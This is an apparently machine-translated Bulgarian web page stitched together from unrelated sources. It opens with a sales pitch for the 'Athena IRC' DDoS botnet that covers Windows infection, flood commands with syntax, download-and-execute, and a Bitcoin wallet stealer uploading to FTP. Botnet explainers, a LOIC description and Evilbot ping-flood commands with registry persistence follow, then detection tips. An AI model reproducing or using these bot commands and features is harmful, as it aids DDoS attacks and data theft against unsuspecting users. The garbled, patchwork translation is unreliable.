Атина IRCе стабилен DDoS бот, кодиран на C++ (нулеви зависимости), идеален за заразяване и преследване на Windows машини. Този бот показва някои от най-добрите, най-модерните DDoS тактики, налични на пазара, които ще свалят уеб сървър. сървъри за игри, TeamSpeak / VoIP сървъри, домашни връзки и др. лесно. Той е устойчив на botkilling и ще убие повечето други налични ботове.
Роботът е оборудван с:
- Botkiller е способен да унищожава ботове като Andromeda, Zeus, SpyEye, Insomniac, SmokeLoader, ngrBot и т.н.
- 11 DDoS метода, същите тактики, използвани в AthenaIRC (някои от най-мощните DDoS тактики, налични на пазара)
- Вграден уебсайт за проверка, който използва ботове, а не като hyperspin.com или just-ping.com
- SmartView / нормален изглед / скрит изглед (от произволен съществуващ браузър)
- Задълбочени статистики за всеки бот
- Изтегляне/Актуализиране/Изтриване
- Shell команди(защото никога не се знае)
Моля, обърнете внимание: Бункерът не е FUD.Команди/функции: (Можете да зададете всяка от тях във вашата тема - ботовете ще анализират командата, за да се свържат)
DDoS команди
[Порт 80 е най-често срещаният за уебсайтове]
! UDP - Изпраща огромно количество произволни пакети към целевия хост/IP, идеален за домашни връзки (СИНТАКСИС: UDP време на хост/IP порт!) [Използвайте "0", за да наводните произволни портове]
! Condis - Бързо свързване/прекъсване на връзката от наводнения, премахва игри (т.е. CSS) и TeamSpeak/VoIP сървъри като gravy (СИНТАКСИС: condis хост/IP времеви порт)
! HttpGet - Бързо изпраща стотици HTTP GET заявки всяка секунда от всеки бот
! HttpPost - Прави стотици HTTP POST заявки от всеки бот и задържа връзката, докато бавно публикува съдържание
Регистрирайте хостинг ←
Екипи наводняват IRC война
! IRC - Свържете се с IRC и наводнете цел (#channel или потребител) с помощта на набор различни методикомуникация в IRC. (Синтаксис: IRC irc.server.net 6667 180 псевдоним / # канал)
! Anope - слой 7 IRC DDoS. Няма значение дали скритият IRC мрежов хъб защитава услугите, те все още могат да бъдат ddos"ed на ниво приложение. Тази атака ще доведе до срив на услугите на Anope. (Синтаксис: Anope irc.server.net 6667 180)
Различни бот команди
! ID - Показва версията на бота и за кого е лицензиран
! Ping – Връща времето за ping на бота към текущата му връзка
! OpenURL - отваря уеб страница в браузъра по подразбиране (синтаксис: OpenURL http://website.com!)
! Openurlhidden - отваря уеб страница, скрита в Internet Explorer(СИНТАКСИС: openurlhidden http://website.com!)
! Blockurl – Създава ред във файла с хостове на компютъра, който отказва достъп до посочения хост (СИНТАКСИС: blockurl website.com)
! dlexec - Зарежда и изпълнява файл от URL (СИНТАКСИС: dlexec http://website.com/program.exe !)
! - Актуализация Изтеглете и изпълнете дадената връзка. Ботът ще бъде изтрит след успешно изпълнение (синтаксис: updatehttp://website.com/file.exe)
! Изтриване - Изтрива бота и премахва всички следи от себе си
Крадци
! Btcwallet - сканира бот компютъра за wallet.dat (BTC) портфейл и го качва на FTP по ваш избор (! СИНТАКСИС: btcwallet ftphost.com user123 pass123)
IRC команди
! Raw - Изпраща необработени команди към сървъра (СИНТАКСИС: необработен PRIVMSG #канал: съобщение!)
! Безшумност вкл./изкл. - Превключва изхода на бот (! заменено от необработена команда)
! Присъединяване - ботът се присъединява към канала (СИНТАКСИС: присъединяване #канал!)
! - Подробности за бота от канала (! СИНТАКСИС: #част от канала)
! Newnick - Променя псевдонима на бота, като използва ново произволно число и име
! Randnick вкл./изкл. - Превключване за произволни имена на ботове (Samantha58385) и информация въз основа на име на бот (ABCDE)
! Повторно свързване - Опитва се да се свърже отново с текущия IRC сървър/мрежа и канал след прекъсване на връзката за 20 секунди
Ботнет или мрежа от ботове е компютърна мрежа, състояща се от голям брой компютри, на които тайно е инсталиран злонамерен софтуер, позволяващ на атакуващите да извършват дистанционно всякакви действия, използвайки изчислителните ресурси на заразените машини. Стотици или дори хиляди заразени компютри обикновено се използват за незаконни и злонамерени дейности – изпращане на спам, вируси, кражба на лични данни или извършване на DDoS атаки. Ботнет мрежите се считат за една от най-сериозните киберзаплахи днес.
Как се появяват ботнетите?
За да стане вашият компютър част от ботнет, той трябва да бъде заразен със специализиран зловреден софтуер, който поддържа връзка с отдалечен сървър или друго заразено устройство, като по този начин получава инструкции за действие от нападателите, които контролират ботнета. Освен впечатляващия мащаб на заразяване, зловреден софтуер, използван за създаване на ботнет мрежи, по същество не се различава много от традиционния зловреден софтуер.
Как да разпознаем ботнет?
Типичният злонамерен софтуер за ботнет може да бъде открит по същия начин, както при всички останали злонамерени програми. Непреките симптоми могат да включват бавна работа, странно поведение, съобщения за грешка или внезапно стартиране на охлаждащия вентилатор, докато компютърът е в режим на готовност. Това са възможни симптоми, че някой дистанционно използва вашия компютър като част от обширна ботнет.
Как да премахнете компютър от ботнет?
Преди да можете да премахнете компютъра си от ботнета, трябва да премахнете злонамерения софтуер, който нападателите използват, за да изпълнят дистанционнозад него. Повечето ефективен начине антивирусно сканиране на вашата компютърна система, което ще ви помогне да откриете злонамерени програми и да ги премахнете от вашия компютър.
Как да избегнете заразяване със специфичен за ботнет зловреден софтуер:
- Качество на инсталиране антивирусно решениекъм вашия компютър
- Настройвам автоматична актуализациявсички програми на трети страни
- Бъдете изключително внимателни, когато следвате връзки, изтегляте програми или отваряте файлове
Други начини да се предпазите от риска да станете част от ботнет:
За да предпазите компютъра си от риска да се превърнете в едно от „зомбитата“ в армията на ботнет, опитайте се да избягвате всякакви подозрителни изтегляния. Не кликвайте върху връзки и не отваряйте прикачени файлове от имейли, чиито податели не са ви известни, и бъдете изключително внимателни, когато инсталирате софтуер на трети страни на вашия компютър. Поддържайте софтуера на трети страни актуален и инсталирайте всички най-нови актуализации операционна система. Най-важното обаче е използването на модерни и качествени антивирусна защита, Например, Антивирус Avastкоято ще осигури надеждна защитакомпютър от всички видове зловреден софтуер и ще ви помогне да избегнете заразяването на вашия компютър и включването му в ботнет.
Днес ботнет мрежите са се превърнали в един от основните инструменти на киберпрестъпниците. ComputerBild ще ви разкаже какво представляват ботнет мрежите, как работят и как да спасите компютъра си от попадане в зомби мрежа.
Ботнет или зомби мрежа е мрежа от заразени компютри зловреден софтуер, позволявайки на нападателите да управляват от разстояние машини на други хора без знанието на техните собственици. IN последните годиниЗомби мрежите се превърнаха в стабилен източник на доходи за киберпрестъпниците. Постоянно ниските разходи и минималните познания, необходими за управление на ботнети, допринасят за растежа на популярността и следователно броя на ботнетите. Нападателите и техните клиенти печелят хиляди долари от DDoS атаки или спам съобщения, извършени чрез зомби мрежи.
Моят компютър заразен ли е с бот?
Не е лесно да се отговори на този въпрос. Факт е, че е почти невъзможно да се проследи намесата на ботове в ежедневната работа на компютъра, тъй като това по никакъв начин не влияе на производителността на системата. Въпреки това има няколко признака, по които можете да определите, че в системата има бот:
Неизвестни програми се опитват да се свържат с интернет, което периодично се отчита възмутено от защитната стена или антивирусния софтуер;
Интернет трафикът става много висок, въпреки че използвате интернет много пестеливо;
Новите се появяват в списъка с изпълнявани системни процеси, маскирани като нормални процеси на Windows (например бот може да се казва scvhost.exe - това име е много подобно на името на системата Процес на Windows svchost.exe; Доста трудно е да забележите разликата, но е възможно).
Защо се създават ботнет мрежи?
Ботнет мрежите са създадени, за да правят пари. Има няколко области на комерсиално печеливша употреба на зомби мрежи: DDoS атаки, събиране конфиденциална информация, изпращане на спам, фишинг, спам при търсене, измамни броячи на кликвания и т.н. Трябва да се отбележи, че всяка посока, която атакуващият избере, ще бъде печеливша, а ботнетът ви позволява да извършвате всички тези видове дейности едновременно.
DDoS атака (от англ. Distributed Denial-of-Service) е атака срещу компютърна система, например на уебсайт, чиято цел е да доведе системата до „падане“, тоест състояние, в което тя вече не може да приема и обработва заявки от законни потребители. Един от най-често срещаните методи за извършване на DDoS атака е изпращането на многобройни заявки към компютъра или уебсайта на жертвата, което води до отказ на услуга, ако ресурсите на атакувания компютър не са достатъчни за обработка на всички входящи заявки. DDoS атаките са страхотно оръжие за хакерите, а ботнетът е идеален инструмент за извършването им.
DDoS атаките могат да бъдат както средство за нелоялна конкуренция, така и актове на кибер тероризъм. Собственикът на ботнет може да предостави услуга на всеки не твърде скрупулен предприемач - да извърши DDoS атака на уебсайта на своя конкурент. След такова натоварване атакуваният ресурс ще „слезе“, нападателят ще получи временно предимство, а киберпрестъпникът ще получи скромна (или не много) награда.
По същия начин собствениците на ботнет могат да използват DDoS атаки, за да изнудват пари от големи компании. В същото време компаниите предпочитат да се съобразяват с изискванията на киберпрестъпниците, тъй като премахването на последствията от успешни DDoS атаки е много скъпо. Например през януари 2009 г. един от най-големите хостери GoDaddy.com претърпя DDoS атака, в резултат на която хиляди сайтове, хоствани на неговите сървъри, бяха недостъпни почти ден. Финансовите загуби на домакина бяха огромни.
През февруари 2007 г. бяха извършени поредица от атаки срещу главните DNS сървъри, от работата на които директно зависи нормалното функциониране на целия Интернет. Малко вероятно е целта на тези атаки да е била срутването World Wide Web, защото съществуването на зомби мрежи е възможно само ако интернет съществува и функционира нормално. Най-вече беше като демонстрация на силата и възможностите на зомби мрежите.
Реклами за услуги за DDoS атаки се публикуват открито в много подходящи форуми. Цените за атаки варират от 50 до няколко хиляди долара на ден непрекъсната работа на DDoS ботнет. Според уебсайта www.shadowserver.org през 2008 г. са извършени около 190 хиляди DDoS атаки, от които киберпрестъпниците са успели да спечелят около 20 милиона долара. Естествено, тази сума не включва приходи от изнудване, което е просто невъзможно да се изчисли.
Събиране на поверителна информация
Поверителната информация, съхранявана на компютрите на потребителите, винаги ще привлича нападатели. Най-голям интерес предизвикват числата кредитни карти, финансова информация и пароли за различни услуги: пощенски кутии, FTP сървъри, месинджъри и др. В същото време модерният зловреден софтуер позволява на атакуващите да избират точно данните, които са интересни за тях - за да направите това, просто изтеглете съответния модул в НАСТОЛЕН КОМПЮТЪР.
Нападателите могат или да продадат открадната информация, или да я използват в своя полза. В множество форуми в интернет всеки ден се появяват стотици обяви за продажба на банкови сметки. Цената на акаунта зависи от сумата пари в акаунта на потребителя и варира от $1 до $1500 на акаунт. Долната граница показва, че в хода на конкуренцията киберпрестъпниците, занимаващи се с този вид бизнес, са принудени да намалят цените. За да печелят наистина много, те се нуждаят от стабилен приток на свежи данни и за това е необходим стабилен растеж на зомби мрежи. Финансовата информация е особено интересна за кардърите - престъпниците, занимаващи се с фалшифициране банкови карти.
Колко печеливши са такива операции може да се съди по известна историяс група бразилски киберпрестъпници, които бяха арестувани преди две години. Те успяха да изтеглят 4,74 милиона долара от банковите сметки на обикновени потребители, използвайки информация, открадната от компютри. Престъпниците, които се занимават с подправяне на документи, откриване на фалшиви банкови сметки, извършване на незаконни транзакции и т.н., също се интересуват от придобиване на лични данни, които не са пряко свързани с парите на потребителя.
Друг вид информация, събирана от ботнет мрежи, са адресите електронна поща, и за разлика от номерата на кредитни карти и номерата на сметки, много имейл адреси могат да бъдат извлечени от адресната книга на един заразен компютър. Събраните адреси се пускат за продажба, понякога „на едро“ - по мегабайт. Основните купувачи на такива „продукти“ са спамърите. Списък от милион имейл адреса струва от 20 до 100 долара, а изпращането на спамъри до същите милиони адреси струва 150-200 долара. Ползата е очевидна.
Престъпниците също се интересуват Сметкиразлични платени услугии онлайн магазини. Разбира се, те са по-евтини от банковите сметки, но тяхното прилагане е свързано с по-малък риск от наказателно преследване от страна на правоприлагащите органи.
Милиони спам съобщения циркулират по света всеки ден. Изпращането на нежелана поща е една от основните функции на съвременните ботнети. Според Kaspersky Lab около 80% от целия спам се изпраща през зомби мрежи. Милиарди писма, рекламиращи виагра, копия на скъпи часовници, онлайн казина и т.н., се изпращат от компютрите на спазващи закона потребители, задръствайки комуникационни канали и пощенски кутии. По този начин хакерите излагат на риск компютрите на невинни потребители: адресите, от които се изпращат писмата, попадат в черните списъци на антивирусните компании.
През последните години обхватът на самите спам услуги се разшири: появи се спам в ICQ, влезе спам в социалните мрежи, форуми, блогове. И това също е „заслуга“ на собствениците на ботнети: в крайна сметка не е трудно да добавите допълнителен модул към бот клиента, който отваря хоризонти за нов бизнес с лозунги като „Спам във Facebook. Евтино." Цените за спам варират в зависимост от целева аудиторияи броя на адресите, до които се изпраща пощата. Цените за целеви съобщения варират от $70 за стотици хиляди адреси до $1000 за няколко десетки милиона адреси. През изминалата година спамерите са спечелили около 780 милиона долара от изпращане на имейли.
Създаване на спам при търсене
Друг случай на използване на ботнет мрежи е увеличаването на популярността на уебсайтовете в търсачките. Когато работят върху оптимизирането на търсачките, администраторите на ресурси се опитват да повишат позицията на сайта в резултатите от търсенето, тъй като колкото по-висока е тя, толкова повече посетители ще имат достъп до сайта чрез търсачкии следователно колкото по-големи са приходите на собственика на сайта, например от продажбата на рекламно пространство на уеб страници. Много компании плащат на уеб администраторите много пари, за да изведат уебсайта си на челни позиции в търсачките. Собствениците на ботнет се възползваха от някои от техните техники и автоматизираха процеса на оптимизиране на търсачките.
Когато видите в коментарите към вашата публикация в LiveJournal или успешна снимка, публикувана на сайт за хостинг на снимки, много връзки, създадени от непознато за вас лице, а понякога и от ваш „приятел“, не се изненадвайте: някой просто поръчаха популяризирането на техния ресурс в ботнета на собствениците. Специално създадена програма се изтегля на зомби компютър и от името на собственика си оставя коментари на популярни ресурси с връзки към популяризирания сайт. Средната цена за нелегални спам услуги за търсене е около $300 на месец.
Колко струват личните данни?
Цената на откраднатите лични данни зависи пряко от държавата, в която живее законният им собственик. Например пълните данни на жител на САЩ струват 5-8 долара. На черния пазар данните на жителите на Европейския съюз са особено ценни - те са два до три пъти по-скъпи от данните на гражданите на САЩ и Канада. Това може да се обясни с факта, че такива данни могат да бъдат използвани от престъпници във всяка страна от ЕС. Средната цена по света за пълен пакет данни за един човек е около $7.
За съжаление, за тези, които решат да организират ботнет от нулата, няма да е трудно да намерят инструкции в интернет за създаване на зомби мрежа. Първа стъпка: създайте нова зомби мрежа. За да направите това, трябва да заразите компютрите на потребителите със специална програма - бот. За заразяване се използват спам съобщения, публикуване на съобщения във форуми и социални мрежи и други техники; Често ботът е оборудван с функция за саморазмножаване, като вируси или червеи.
Използват се техники за социално инженерство, за да се принуди потенциална жертва да инсталира бот. Например, те предлагат да гледате интересно видео, което изисква изтегляне на специален кодек. След като изтегли и стартира такъв файл, потребителят, разбира се, няма да може да гледа видео и най-вероятно няма да забележи никакви промени, а компютърът му ще бъде заразен и ще се превърне в послушен слуга, изпълняващ всички команди на собственика на ботнет.
Вторият широко използван метод за заразяване с ботове е изтегляне чрез изтегляне. Когато потребител посети заразена уеб страница на своя компютър през различни „дупки“ в приложенията - предимно в популярни браузъри - зловреден код. Използва се за използване на слаби места специални програми- подвизи. Те ви позволяват не само тихо да изтегляте, но и тихо да стартирате вирус или бот. Този тип разпространение на зловреден софтуер е най-опасният, защото ако популярен ресурс бъде хакнат, десетки хиляди потребители ще бъдат заразени!
Ботът може да бъде оборудван с функция за саморазмножаване компютърни мрежи. Например, може да се разпространи чрез заразяване на всички налични изпълними файлове или чрез търсене и заразяване на уязвими компютри в мрежа.
Създателят на ботнет може да контролира заразените компютри на нищо неподозиращи потребители, използвайки командния център на ботнета, комуникирайки с ботовете чрез IRC канал, уеб връзка или чрез всякакви други налични средства. Достатъчно е да свържете няколко десетки машини в мрежа, за да може ботнетът да започне да генерира приходи за своя собственик. Освен това този доход е в линейна зависимоствърху стабилността на зомби мрежата и нейния темп на растеж.
Компаниите за онлайн реклама, работещи по схемата PPC (Pay-per-Click), плащат пари за уникални кликвания върху връзки към реклами, публикувани в Интернет. За собствениците на ботнет измамването на такива компании е печеливш бизнес. Например можете да вземете добре познатата мрежа Google AdSense. Рекламодателите, включени в него, плащат на Google за кликове върху публикувани реклами с надеждата, че потребителят, който се отбие, ще купи нещо от тях.
Google от своя страна поставя контекстна реклама на различни сайтове, участващи в програмата AdSense, като плаща на собственика на сайта процент от всяко кликване. Уви, не всички собственици на уебсайтове са честни. Със зомби мрежа хакерът може да генерира хиляди уникални кликвания на ден, по един от всяка машина, без да предизвиква много подозрения от Google. Така парите, похарчени за рекламната кампания, ще потекат в джоба на хакера. За съжаление все още няма нито един случай, в който някой да е потърсен отговорност за подобни действия. Според Click Forensics през 2008 г. около 16-17% от всички кликвания върху рекламни връзки са фалшиви, от които поне една трета са генерирани от ботнет мрежи. След като извършите прости изчисления, можете да разберете, че миналата година собствениците на ботнети са „прибрали“ 33 000 000 долара. Добър доход от щраквания с мишката!
Нападателите и нечестните бизнесмени не е задължително да създават ботнет от нулата сами. Те могат да купуват или наемат ботнети с различни размери и производителност от хакери - например като се обърнат към специализирани форуми.
Цената на готовия ботнет, както и цената за наемането му, пряко зависи от броя на компютрите, включени в него. Готовите ботнети са най-популярни в англоезичните форуми.
Малките ботнети, състоящи се от няколкостотин бота, струват между $200 и $700. В същото време средната цена на един бот е приблизително 50 цента. По-големите ботнети струват повече пари.
Зомби мрежата Shadow, която беше създадена преди няколко години от 19-годишен хакер от Холандия, се състоеше от повече от 100 хиляди компютъра, разположени по целия свят, и беше продадена за 25 000 евро. За тези пари можете да си купите малка къща в Испания, но престъпник от Бразилия избра да закупи ботнет.
Инструменти за защита на ботнет
1. На първо място, това са антивирусни програми и цялостни пакети за защита срещу интернет заплахи с редовно актуализирани бази данни. Те ще помогнат не само да откриете опасността навреме, но и да я премахнете, преди вашият верен „железен приятел“, превърнат в зомби, да започне да изпраща спам или да „пуска“ сайтове. Изчерпателни пакети, като Kaspersky интернет сигурност 2009, съдържат пълен набор от защитни функции, които могат да се управляват чрез общ команден център.
Антивирусен модул в заден плансканира най-важното системни областии контролира всичко възможни начиниВирусни прониквания: прикачени файлове към имейли и потенциално опасни уебсайтове.
Защитната стена следи комуникацията между персонален компютъри интернет. Той проверява всички пакети данни, получени от или изпратени до мрежата и, ако е необходимо, блокира мрежови атакии предотвратява тайното изпращане на лични данни през интернет.
Спам филтърът защитава Пощенска кутияот проникване на рекламни съобщения. Неговите задачи включват също идентифициране на фишинг имейли, с помощта на които нападателите се опитват да извлекат информация от потребителя относно неговите идентификационни данни за влизане в онлайн платежни или банкови системи.
2. Редовни актуализации на операционната система, уеб браузърите и другите приложения, чиито разработчици откриват и отстраняват много пропуски в тяхната защита, както и слаби места, използвани от нападателите.
3. Специални програми за криптиране ще защитят вашите лични данни, дори ако ботът вече е проникнал в компютъра, тъй като за достъп до него той ще трябва да разбие паролата.
4. Здрав разум и предпазливост. Ако искате да защитите данните си от различни видове заплахи, не трябва да изтегляте и инсталирате програми с неизвестен произход, да отваряте архиви с файлове въпреки антивирусните предупреждения, да посещавате сайтове, които вашият браузър маркира като опасни и др.
Благодарим на Kaspersky Lab за съдействието им при подготовката на материала
LOIC е програма, която позволява активирането на DDoS атака на уебсайт или сървър. Този инструмент първоначално е създаден, за да провери защитата, която е върху него. Програмата е предназначена за стартиране на DDOS атаки и работи като специален инструмент, така че я използвайте само за експерименти.
Програмата има достъп до изходния код. Ако е необходимо, изтеглете допълнителни материали от услугата SourceForge. Източникът обозначава програмата като зловреден софтуер. Когато изтегляте Low Orbit Ion Cannon, моля, не забравяйте, че го използвате на свой собствен риск.
Принцип на действие
Програмата се инжектира в сървъра и извършва многопластова атака, отваряйки множество връзки към сървъра. След това "LOIC" прекъсва сървъра и постига код за грешка, който означава "победа". Прекъсването на сървъра възниква в последователен режим. В прозореца на програмата виждате подробна статистика за наличните грешки на сървъра и неговата производителност.„Хакване на сървър“ с DDoS атаки, виждате данни за активни връзки. Тези параметри се променят постоянно по време на атаката. Освен това виждате съобщения за код, който се връща от сървъра и се опитва да се свърже с него в стандартен режим.
Помощната програма работи в стандартен режим, използвайки конвенционални инструменти и методи за хакване. LOIC „хвърля“ спам в HTTP заявки и причинява срив на устройството. LOIC се разпространява в стандартна версия, както и версия за атака чрез новинарски канали и комуникационни програми. Втората версия на програмата е подходяща за създателите на ботнет.
Интерфейс
Всички функции в програмата LOIC са разположени на един панел. Като посочите адреса на сървъра или IP адреса за атаката, ще видите списък налични връзки. GUIпрост и интуитивен, но няма руска локализация в черупката. Често такива инструменти не са преведени на руски.Основни функции
- инструментът „хаква“ сървъра, извършвайки атака и причинява повреда на оборудването в него;
- програмата има прост интерфейс, който се създава в режим на един прозорец;
- LOIC изпраща спам под формата на заявки чрез HTTP и други пакети;
- има в интерфейса източникс свободен достъп, който е създаден на езика за програмиране C#;
- "cracker" работи върху компилации на ОС Windows старпоколения;
- Програмата работи с безплатен лиценз.
IRC ботовете се превръщат в инструмент за DDOS атаки. Уникалните автомобили вече не са
са необходими за извършване на DOS атаки (вероятно имате програми като TFN, Trin00, които работят на *nixes), всичко вече е станало много по-просто.
Сега на всеки WindowsМожете да прикачите свой собствен бот към колата си, който е лесен за настройка и управление. Атаките се контролират от канала, към който се присъединяват ботовете. Пристигайки в канала, ботът просто „седи и чака“ командите на собственика. Обикновено така
каналите са или секретни, или защитени с парола, така че само неговият собственик може да влезе в канала и да контролира действията на бота.
Но този метод на DDOS атаки има един огромен недостатък: жертвата може да разбере сървъра, канала и паролата към него. Това може да доведе до това той просто да „открадне“ вашата армия от ботове. Но това може да се избегне, като се нареди на ботовете да се свързват с различни сървъри, така че проследяването на всички ботове на всички сървъри ще бъде много трудно (представете си, да кажем, че дузина ботове се свързват към първия канал, дузина към втория и т.н. на - доста е трудно да се изчислят ВСИЧКИ ботове в такава ситуация) .
Как ботовете атакуват жертвите?
Разлика между DOS и DDOS атакие огромно: докато DOS атака се извършва с помощта на известна дупка в системата, DDOS атака наводнява машината от различни хостове с безсмислени пакети, което забавя способността на системата да получава и обработва данни и от това
изключително трудна за защита. DDOS IRC ботовете, работещи на Win9x, изпращат UDP и ICMP
пакети (т.е. ping) до максималния изходящ пропускателна способностхоста
Има ботове, които могат да генерират много по-опасни пакети, които нарушават синхронизирането на TCP връзката (TCP Syn/Ack), но такива атаки не могат да бъдат извършени от хостове, работещи с Win9x. Обикновено такива ботове се инсталират на Win2K/XP -
само има всички необходими средства. Те могат да направят атаката срещу уеб сървър много сложна и трудна за блокиране: UDP и ICMP могат по някакъв начин да бъдат филтрирани от доставчика и не могат да повлияят на качеството на услугите, но TCP пакетите не могат да бъдат деактивирани, без да засегнат трафика. Обикновено, когато TCP е деактивиран, това означава, че сървърът не може правилно да предоставя уеб и ftp услуги.
Вече има готови ботове, написани специално за използване в Win2k и WinXP среда (например Evilbot или Slackbot 1.0). Именно с помощта на Evilbot grc.com беше наводнен.Самият бот представлява малък файл (10-16 kb), който жертвата стартира на своята машина, след което ботът се регистрира в директорията на Windows (за пример: \Windows\WinRun2. exe).За да стартира всеки път, ботът се регистрира в секцията за автоматично стартиране в системния регистър:
HKEY_LOCAL_MACHINE\SOFTWARE\ Microsoft\Windows\CurrentVersion\Run\ и изглежда по следния начин:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinRun. Evilbot никога няма да пренапише файловете си, а само се пререгистрира в системния регистър, където посочва пътя до своята директория.
След това ботът се опитва да се свърже с конкретен IRC сървър, отива там и тихо седи на канала, чакайки команди. В същото време той
свързва се с друг сървър, откъдето изтегля троянския кон, стартира го нещо подобно: “update.ur.address./thepath.exe”. Ако ботът е първият, който влезе в нерегистриран канал, той веднага инсталира mod + nstk по подразбиране. Evilbot слуша всяко лице, присъстващо на канала (и Slackbot 1.0 иска парола). Може да се нареди да пингва конкретен хост: "!udp 101.105.201.212 1000 0", където 1000 е броят на пакетите, а 0 в края е забавянето между пакетите.
Пингът на Evilbot е както следва:
P4
Изпраща 10000 64 kbyte ping пакета до конкретен ip
!p3< ip жертвы >
Изпраща 1000 64 kbyte ping пакета до определен ip
!p2< ip жертвы >
Изпраща 100 64 kbyte ping пакета до определен ip
!p1< ip жертвы >
Изпраща 10 64 kbyte ping пакета до определен ip
Броят на ping-овете и техният размер могат да варират - например командата!p4 изпраща 15000 32-байтови ICMP пакета към посочения ip.
Как мога да разбера дали имам бот в системата си?
Някои антивируси не виждат ботове в системата, но можете да ги откриете ръчно, като проверите компютъра си за наличие на неоторизирана IRC връзка. Можете просто да проверите всичките си интернет връзка: netstat -an | намери ":6667"
Ако потвърди активна връзка за вас, възможно е машината ви да е заразена. Няма да навреди да проверите други портове, които IRC често използва.
Можете да погледнете в регистъра и да го проверите за нови подозрителни промени тук:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run. Ако намерите ключ, показващ наличието на бот, изтрийте го, рестартирайте компютъра си и изтрийте гадния бот.
Зареждане...